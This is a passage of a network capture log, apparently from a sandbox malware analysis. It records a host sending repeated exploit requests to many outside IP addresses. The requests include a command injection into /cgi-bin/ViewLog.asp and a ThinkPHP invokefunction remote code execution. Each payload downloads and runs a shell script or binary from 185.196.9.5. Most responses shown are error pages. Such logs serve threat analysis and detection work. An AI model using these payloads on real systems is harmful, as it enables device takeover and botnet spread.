Feb 25, 2024 19:03:30.301759958 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Sun, 25 Feb 2024 18:04:01 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
410	192.168.2.15	48304	31.136.77.59	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:30.117898941 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:30.693927050 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:31.813935041 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:34.117861032 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:38.725996017 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:47.685811996 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:05.605679989 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.469234943 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
411	192.168.2.15	41078	94.123.3.85	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:30.164791107 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
412	192.168.2.15	45096	94.120.19.22	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:30.165147066 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
413	192.168.2.15	44842	112.80.145.157	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:30.535840034 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:31.575633049 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
414	192.168.2.15	40540	112.186.214.117	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:31.841332912 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:32.136873007 CET	243	IN	HTTP/1.0 404 Not Found Content-type: text/html Date: Sun, 25 Feb 2024 18:03:34 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL was not found</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
415	192.168.2.15	56412	112.124.57.246	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:31.844450951 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:32.145924091 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:31 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
416	192.168.2.15	40544	112.186.214.117	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:32.562443018 CET	236	IN	HTTP/1.0 400 Bad Request Content-type: text/html Date: Sun, 25 Feb 2024 18:03:35 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Unsupported method</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
417	192.168.2.15	45410	85.209.138.226	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:32.629425049 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:33.829906940 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:34.050170898 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 17:37:27 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
418	192.168.2.15	59724	94.123.96.232	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:32.629443884 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:33.829941988 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:35.237915993 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:38.213855028 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:43.845792055 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:55.109787941 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:17.893465042 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:02.948987007 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
419	192.168.2.15	41288	94.123.76.215	8080

Timestamp	Bytes transferred	Direction	Data
